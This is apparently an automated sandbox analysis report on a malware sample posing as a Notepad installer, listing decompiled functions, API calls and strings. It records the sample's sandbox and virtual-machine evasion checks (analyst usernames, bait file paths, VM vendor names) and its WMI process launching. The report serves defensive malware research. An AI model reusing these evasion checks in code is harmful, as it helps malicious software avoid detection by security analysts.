                                      • NtQueryInformationProcess.NTDLL(?,00000018,?,00000004,006E3FB1), ref: 006E4029
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      • Opcode ID: 123e4657b3a27426f7f27084b8cad94337b2a13be8aac613b0e311a5378db81d
                                      • Instruction ID: a0cff632571c7a54850d73864620b6d9361886c44494a2613c755e69988ded40
                                      • Opcode Fuzzy Hash: 123e4657b3a27426f7f27084b8cad94337b2a13be8aac613b0e311a5378db81d
                                      • Instruction Fuzzy Hash: 2CD0C77619010DBBDF01CF51DC42ED93BACAB04749F005111B605D6090D675D7489BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: kernel32.dll
                                      • API String ID: 0-1793498882
                                      • Opcode ID: 1b38b52a736695656a5a5060570de7cb8f579053bd7f829a01c1bc0a8f11b491
                                      • Instruction ID: ab2849e1882ae6ba460fd7e5c22cf4283c75f21873056d6cc877f50b34918d8b
                                      • Opcode Fuzzy Hash: 1b38b52a736695656a5a5060570de7cb8f579053bd7f829a01c1bc0a8f11b491
                                      • Instruction Fuzzy Hash: B5F0AF32602B94EBCB20CF4ED98196AF7F9EF04358715092AE846E7701E370FE0087A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: c65f2f7900be347268ecb06d652d63ff972f9bb12939db74b80a776ac636d5f1
                                      • Instruction ID: 0820498589e11ff33423db07696112d0d57b183a1f587f84178fe40461c980a5
                                      • Opcode Fuzzy Hash: c65f2f7900be347268ecb06d652d63ff972f9bb12939db74b80a776ac636d5f1
                                      • Instruction Fuzzy Hash: 48E0466291A3C8BBDF12C7A66542ACEBFA40B22344F1888C8D140A7242C0749A48DB26
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bc2e3788365afafc72a46c1df4c6c86f55bf04dc52f861ab9053123fffbd75f
                                      • Instruction ID: 043a6723b7cd088c982a26dd52d70bd52f3efd18387823fecdfdf3ee617c62f2
                                      • Opcode Fuzzy Hash: 4bc2e3788365afafc72a46c1df4c6c86f55bf04dc52f861ab9053123fffbd75f
                                      • Instruction Fuzzy Hash: 2B128131A01269DFCB08CF29C4E05AC7BB7FF44355F2186AAED569B291D770DA81CB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a20624c93ede2d283c588f0418485a120be06432b38f5356041a4a9951023a59
                                      • Instruction ID: 1bb80b9ba763bf3e44913aeab0c473c8ca83acaf397d919a26fb1603ef7ace68
                                      • Opcode Fuzzy Hash: a20624c93ede2d283c588f0418485a120be06432b38f5356041a4a9951023a59
                                      • Instruction Fuzzy Hash: EA417F262097C49FC315CB7D8891C9ABFE29FA3204769C6CCD0855F767C1B1E949C7A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c98f4306506d02197349f117bc0784cdebd68f73380392c04d34607800d75ba5
                                      • Instruction ID: 79b52482fff9855e695113d8f671738deac2ac053c010198e9a5798394b3341f
                                      • Opcode Fuzzy Hash: c98f4306506d02197349f117bc0784cdebd68f73380392c04d34607800d75ba5
                                      • Instruction Fuzzy Hash: C6210624D1C34246F376822D48847936AA6A784354F14CE3EDD48E13E5E67DECC8C21A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E00402446(intOrPtr _a4, signed int _a8, signed int _a12) {
                                      				signed int _t13;
                                      				signed int _t15;
                                      				signed int _t34;
                                      				signed int _t36;
                                      				signed char* _t37;
                                      				signed int _t38;
                                      				signed int _t39;
                                      				signed int* _t44;
                                      				signed char* _t46;
                                      				signed int _t47;
                                      
                                      				_t34 = _a8;
                                      				_t47 = _a12;
                                      				_t36 = _t34 & 0xfffffffc;
                                      				_t46 = _t36 + _a4;
                                      				_t13 = _t34 >> 2;
                                      				if(_t13 != 0) {
                                      					_t44 = _t36 +  ~_t13 * 4 + _a4;
                                      					_t37 = _t46;
                                      					do {
                                      						asm("rol eax, 0xf");
                                      						asm("rol eax, 0xd");
                                      						_t47 = ( *_t44 * 0xcc9e2d51 * 0x1b873593 ^ _t47) + ( *_t44 * 0xcc9e2d51 * 0x1b873593 ^ _t47) * 4 - 0x19ab949c;
                                      						_t44 =  &(_t44[1]);
                                      					} while (_t44 != _t37);
                                      				}
                                      				_t15 = _t34 & 0x00000003;
                                      				if(_t15 == 2) {
                                      					_t38 = 0;
                                      					goto L8;
                                      				} else {
                                      					if(_t15 == 3) {
                                      						_t38 = (_t46[2] & 0x000000ff) << 0x10;
                                      						L8:
                                      						_t39 = _t38 ^ (_t46[1] & 0x000000ff) << 0x00000008;
                                      						goto L9;
                                      					} else {
                                      						if(_t15 == 1) {
                                      							_t39 = 0;
                                      							L9:
                                      							asm("rol eax, 0xf");
                                      							_t47 = _t47 ^ ( *_t46 & 0x000000ff ^ _t39) * 0xcc9e2d51 * 0x1b873593;
                                      						}
                                      					}
                                      				}
                                      				return ((_t47 ^ _t34 ^ (_t47 ^ _t34) >> 0x00000010) * 0x85ebca6b >> 0x0000000d ^ (_t47 ^ _t34 ^ (_t47 ^ _t34) >> 0x00000010) * 0x85ebca6b) * 0xc2b2ae35 ^ ((_t47 ^ _t34 ^ (_t47 ^ _t34) >> 0x00000010) * 0x85ebca6b >> 0x0000000d ^ (_t47 ^ _t34 ^ (_t47 ^ _t34) >> 0x00000010) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1bb12fd28983538cf371d34fec06ec2c8fc80d3349e2e0be66397c7f0c841eca
                                      • Instruction ID: 7be8a8d7acb75c00bdebabba72bc16afa5b0ea55f0702d97b1ef5954f73505b6
                                      • Opcode Fuzzy Hash: 1bb12fd28983538cf371d34fec06ec2c8fc80d3349e2e0be66397c7f0c841eca
                                      • Instruction Fuzzy Hash: 7B11363131821A0ED325DC3D8E8A127B7C6D7C5210F54893FE89ACB3D1E478DA5AD2A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 89%
                                      			E00404120(void* __fp0) {
                                      				signed int _v24;
                                      				signed int _t21;
                                      				signed int _t28;
                                      				signed int _t29;
                                      				unsigned int _t30;
                                      				unsigned int _t36;
                                      				signed int _t37;
                                      				signed int _t41;
                                      				signed int _t42;
                                      				unsigned int _t45;
                                      				unsigned int _t49;
                                      				signed int* _t57;
                                      
                                      				_t42 =  *0x424fac; // 0x0
                                      				_t21 =  *0x424fa8; // 0xb
                                      				_t37 =  *0x424fb0; // 0x5497fdb5
                                      				_t29 =  *0x424fb4; // 0x106689d4
                                      				 *_t57 = _t37;
                                      				 *0x424fa8 = _t37;
                                      				_t38 =  *_t57;
                                      				_t56 = _t21 ^ _t21 << 0x00000017;
                                      				_v24 = _t29;
                                      				_t49 = _t42 ^ (_t42 << 0x00000020 | _t21) << 0x17;
                                      				 *0x424fac = _t29;
                                      				_t30 = _v24;
                                      				_t41 =  *_t57 ^ (_t30 << 0x00000020 | _t38) >> 0x1a ^ _t21 ^ _t21 << 0x00000017 ^ (_t49 << 0x00000020 | _t56) >> 0x11;
                                      				 *0x424fb0 = _t41;
                                      				_t36 = _v24 ^ _t30 >> 0x0000001a ^ _t49 ^ _t49 >> 0x00000011;
                                      				_t45 = _t36;
                                      				asm("adc edx, [esp+0x4]");
                                      				 *0x424fb4 = _t36;
                                      				_t28 = (_t45 << 0x00000020 | _t41 +  *_t57) >> 0xb;
                                      				 *_t57 = _t28;
                                      				_v24 = _t45 >> 0xb;
                                      				asm("fild qword [esp]");
                                      				return _t28;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c10a91c278383aa1daecd3da3ada66852a96d673215edf4d1e9866bc2019ffd2
                                      • Instruction ID: 1f50052fb507fd8a21823964d6503f13664692f934f5af635af07eabe4d7d022
                                      • Opcode Fuzzy Hash: c10a91c278383aa1daecd3da3ada66852a96d673215edf4d1e9866bc2019ffd2
                                      • Instruction Fuzzy Hash: C6111C72B082149FC318DF6AEA8064AB7E2F7CC310F86853DE949C7794D6709C15DB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion
                                      • String ID:
                                      • API String ID: 2793162063-0
                                      • Opcode ID: 9bd31347606c97fb0e9bf6c3c65c8f4cfb63b626d92c54a12c4832f3ff7d0b43
                                      • Instruction ID: 40147a7b8d3d28cf3da8b09ddb05fa1f60e8e5b690be847c48fd5dcda3ed35f0
                                      • Opcode Fuzzy Hash: 9bd31347606c97fb0e9bf6c3c65c8f4cfb63b626d92c54a12c4832f3ff7d0b43
                                      • Instruction Fuzzy Hash: 7EE0E5B1A51284EFE710CB9DCD42B4C73F8EF05B88F540094E905EB782D6B5EE10DA54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$InfoVerifyVersion
                                      • String ID:
                                      • API String ID: 2793162063-0
                                      • Opcode ID: 6380cd29a84552bc9504bd3dd7dffd6d7dd4a96f0085ed49b1d8a96b33e6956d
                                      • Instruction ID: 944a05f5538c265677521d1dc78e59251330da37f281f50959654efad5a2ea4e
                                      • Opcode Fuzzy Hash: 6380cd29a84552bc9504bd3dd7dffd6d7dd4a96f0085ed49b1d8a96b33e6956d
                                      • Instruction Fuzzy Hash: 05E0E571A41684EFD710CB9DCD82B4C73F8AF05B88F5804A4E509EB782D674EE10DA54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f0b9217784534b5faaed6ea7cf9b711b647bd11df21ec4eb28890a62b8d291a
                                      • Instruction ID: 02f23f29ec18854db6d0e7cc4bc5b7cab390f07376cb572faa4ce52d4930c70d
                                      • Opcode Fuzzy Hash: 7f0b9217784534b5faaed6ea7cf9b711b647bd11df21ec4eb28890a62b8d291a
                                      • Instruction Fuzzy Hash: A1C08C72610248EFCB12CF5DCA02A0AB3F8EB00B48F0002F0E002EB200D770EF00CA54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc7fe59a4b8a6a62216f91363d27c0aaa9956475599f33ca2db264bfaa45f8e8
                                      • Instruction ID: ff7b755e27313bec30199fb430c49c250b39fdb30b58f68779e47b2259e33fe1
                                      • Opcode Fuzzy Hash: bc7fe59a4b8a6a62216f91363d27c0aaa9956475599f33ca2db264bfaa45f8e8
                                      • Instruction Fuzzy Hash: A8C01230912288EFCB01CB89C212B9ABBF8EB00749F204094E400E3241C278EF00AB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a9dd0ce9f8081e748ac72becd36064f8be19ca80f2bfbebf7e67bebac1c5ce0
                                      • Instruction ID: 70350a7fe61a1b7af4f8bbbc9b12ba019c40a4c300e540abae43ca4921a94070
                                      • Opcode Fuzzy Hash: 0a9dd0ce9f8081e748ac72becd36064f8be19ca80f2bfbebf7e67bebac1c5ce0
                                      • Instruction Fuzzy Hash: 88B0126061820D7F8B08C787D802C9EB7BDD60225CF000184B9016224091F0FD404260
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8875717e1a7d0122a448873d6540e11825907da3543076021a44e732ccc3e6a8
                                      • Instruction ID: 98790265235e98c9312c919b89e696547998febc0019e7b499a082d4753a36b4
                                      • Opcode Fuzzy Hash: 8875717e1a7d0122a448873d6540e11825907da3543076021a44e732ccc3e6a8
                                      • Instruction Fuzzy Hash: 77B0126061020D7F8B08C787D802C8EB7BDDA0125CF200188B8006224091B0FD404270
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: Co$Do$HDo$accep$connectio$cooki$dEo$dat$eta$expec$expect-c$expire$forwarde$hos$if-matc$if-rang$keep-aliv$locatio$origi$rang$refere$serve$set-cooki$upgrad$user-agen$var$x-traffi$xDo$Co
                                      • API String ID: 1475443563-3999747238
                                      • Opcode ID: 1816a77767b1a2de34ba12d6eb02408dc779ef3dfc68108c77fe72641b092d44
                                      • Instruction ID: 8285f633e1486e5e28085b2271f8e3da73ff560d9b53165980cc32841b87c4ba
                                      • Opcode Fuzzy Hash: 1816a77767b1a2de34ba12d6eb02408dc779ef3dfc68108c77fe72641b092d44
                                      • Instruction Fuzzy Hash: F081B149B8F3C832DA60962B1C46BBB2E4B6B21756F0545A4FF44ED7C7FA91CE038149
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006EA63E: malloc.MSVCRT ref: 006EA64C
                                        • Part of subcall function 006EA63E: GetUserNameW.ADVAPI32(00000000,00000000), ref: 006EA65E
                                        • Part of subcall function 006EA63E: ??3@YAXPAX@Z.MSVCRT ref: 006EA669
                                        • Part of subcall function 006EA730: malloc.MSVCRT ref: 006EA73E
                                        • Part of subcall function 006EA730: GetComputerNameW.KERNEL32(00000000,00000010), ref: 006EA750
                                        • Part of subcall function 006EA730: ??3@YAXPAX@Z.MSVCRT ref: 006EA75B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA7D5
                                        • Part of subcall function 006EA93A: GetFileAttributesW.KERNEL32(?,006EB609,?), ref: 006EA93E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA7F1
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA7F4
                                      • lstrcmpW.KERNEL32(00000000,Wilber), ref: 006EA811
                                      • StrCmpNIW.SHLWAPI(00000000,006F5120,00000002), ref: 006EA825
                                      • StrCmpNIW.SHLWAPI(00000000,006F5118,00000002), ref: 006EA837
                                      • lstrcmpW.KERNEL32(00000000,admin), ref: 006EA848
                                      • lstrcmpW.KERNEL32(00000000,SystemIT), ref: 006EA854
                                      • StrCmpW.SHLWAPI(00000000,admin), ref: 006EA866
                                      • StrCmpW.SHLWAPI(?,KLONE_X64-PC), ref: 006EA875
                                      • StrCmpW.SHLWAPI(00000000,John), ref: 006EA885
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA921
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA924
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA92A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$lstrcmp$Namemalloc$AttributesComputerFileUser
                                      • String ID: C:\123\email.doc$C:\123\email.docx$C:\a\foobar.bmp$C:\a\foobar.doc$C:\a\foobar.gif$C:\email.doc$C:\email.htm$C:\loaddll.exe$C:\take_screenshot.ps1$John$KLONE_X64-PC$SystemIT$Wilber$admin
                                      • API String ID: 2231711986-3596196378
                                      • Opcode ID: b562884cef224b63f6e2595573b4f9950d573b799de4596c1d38e4577e07ee00
                                      • Instruction ID: ce0aece8ea535e3b28db79d4143984d45ca03f0fdeaa8a8ea554e2d25c0d2009
                                      • Opcode Fuzzy Hash: b562884cef224b63f6e2595573b4f9950d573b799de4596c1d38e4577e07ee00
                                      • Instruction Fuzzy Hash: 3931233125738A69AA50B7E35C06F3B2AAF8E60755B13002EFA49D5683EF40FC0645A7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(ROOT\CIMV2), ref: 006E6F92
                                      • SysAllocString.OLEAUT32(Win32_Process), ref: 006E6FD4
                                      • SysAllocString.OLEAUT32(Create), ref: 006E7006
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006E34D4), ref: 006E705B
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006E34D4), ref: 006E7065
                                      • calloc.MSVCRT ref: 006E7071
                                      • _snwprintf.NTDLL ref: 006E7091
                                      • SysAllocString.OLEAUT32(?), ref: 006E70A3
                                      • SysAllocString.OLEAUT32(006E34D4), ref: 006E70B1
                                      • SysFreeString.OLEAUT32(?), ref: 006E711B
                                      • SysFreeString.OLEAUT32(?), ref: 006E7120
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E712E
                                      • SysFreeString.OLEAUT32(?), ref: 006E7146
                                      • SysFreeString.OLEAUT32(006E34D4), ref: 006E7158
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$Alloc$Free$lstrlen$??3@_snwprintfcalloc
                                      • String ID: "%s" %s$CommandLine$Create$CurrentDirectory$ROOT\CIMV2$Win32_Process
                                      • API String ID: 4216031338-2535204926
                                      • Opcode ID: 4a1f3aa2fd246f1b20be5879b0a374b81a156137a5592f0b87ebf7b965ff39b0
                                      • Instruction ID: 8865009dd990fe2600978cae587bde300b2c8fb06b22e4a570e9dbdff99d9509
                                      • Opcode Fuzzy Hash: 4a1f3aa2fd246f1b20be5879b0a374b81a156137a5592f0b87ebf7b965ff39b0
                                      • Instruction Fuzzy Hash: 38710670A01329AFCB10DBA5CC88DEEBFBAFF49754B144459F509E7260DA719A41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006EA63E: malloc.MSVCRT ref: 006EA64C
                                        • Part of subcall function 006EA63E: GetUserNameW.ADVAPI32(00000000,00000000), ref: 006EA65E
                                        • Part of subcall function 006EA63E: ??3@YAXPAX@Z.MSVCRT ref: 006EA669
                                      • lstrcmpiW.KERNEL32(006F4ED8,00000000,006EA46B,?,00000000), ref: 006EA61B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA62F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$NameUserlstrcmpimalloc
                                      • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$user$virus
                                      • API String ID: 826662291-2542899860
                                      • Opcode ID: 0066facef564373f44c72e2c0fe228f36a5013f95da6f74a4b7cb9fc74cd72d6
                                      • Instruction ID: 500ffec0849b9422931af70c616d5ddbf4f0b906dd3ae9fc70e5bbb101f51c40
                                      • Opcode Fuzzy Hash: 0066facef564373f44c72e2c0fe228f36a5013f95da6f74a4b7cb9fc74cd72d6
                                      • Instruction Fuzzy Hash: 9B11DFB1C0124DABCB108FC5E9885FEBFB6FF45758F614108E6107AA10DBB05A0ACF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • socket.WS2_32(?,00000001,00000000), ref: 006F06B7
                                      • WSAGetLastError.WS2_32(?,?,?,006F131D,00000000,00000064), ref: 006F06CD
                                      • WSAGetLastError.WS2_32(?,?,?,006F131D,00000000,00000064), ref: 006F06D3
                                      • WSAGetLastError.WS2_32(?,?,?,006F131D,00000000,00000064), ref: 006F06D7
                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,006F131D,00000000,00000064), ref: 006F06F4
                                      • GetLastError.KERNEL32(?,?,?,006F131D,00000000,00000064), ref: 006F0704
                                      • GetLastError.KERNEL32(?,?,?,006F131D,00000000,00000064), ref: 006F070A
                                      • GetLastError.KERNEL32(?,?,?,006F131D,00000000,00000064), ref: 006F070E
                                      • closesocket.WS2_32(00000000), ref: 006F072F
                                      • memset.NTDLL ref: 006F0745
                                      • GetLastError.KERNEL32 ref: 006F07A6
                                      • WSAGetLastError.WS2_32 ref: 006F07B3
                                      • WSAGetLastError.WS2_32 ref: 006F07BD
                                      • WSAGetLastError.WS2_32 ref: 006F07C5
                                      • closesocket.WS2_32(?), ref: 006F07E9
                                      • CloseHandle.KERNEL32(73891846), ref: 006F07F7
                                      • RegisterWaitForSingleObject.KERNEL32(006F1471,7459C085,006F0870,006F131D,000000FF,00000004), ref: 006F0834
                                      • GetLastError.KERNEL32 ref: 006F0844
                                      • GetLastError.KERNEL32 ref: 006F084A
                                      • GetLastError.KERNEL32 ref: 006F084E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                      • String ID:
                                      • API String ID: 1241441197-0
                                      • Opcode ID: b2f4314ed96417bfc93cb6c71ddc870f025f6d7fc35228d75fb12e547601d152
                                      • Instruction ID: dac15ee5e5c7af1cdbb17d6ba283a3e74f112356cac169669c6663d11ffa2f87
                                      • Opcode Fuzzy Hash: b2f4314ed96417bfc93cb6c71ddc870f025f6d7fc35228d75fb12e547601d152
                                      • Instruction Fuzzy Hash: B651B032500A0AEFEB14AF70CC45BBA77BAFF04364F204229E626C6192D775E951CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrIW.SHLWAPI(?,VMWare), ref: 006EAD51
                                      • StrStrIW.SHLWAPI(?,Parallels), ref: 006EAD5F
                                      • wcscmp.NTDLL ref: 006EAD6D
                                      • StrStrIW.SHLWAPI(?,Xen), ref: 006EAD81
                                      • StrStrIW.SHLWAPI(?,Virtual), ref: 006EAD8F
                                      • StrStrIW.SHLWAPI(?,A M I), ref: 006EAD9D
                                      • VariantClear.OLEAUT32(00000008), ref: 006EADA7
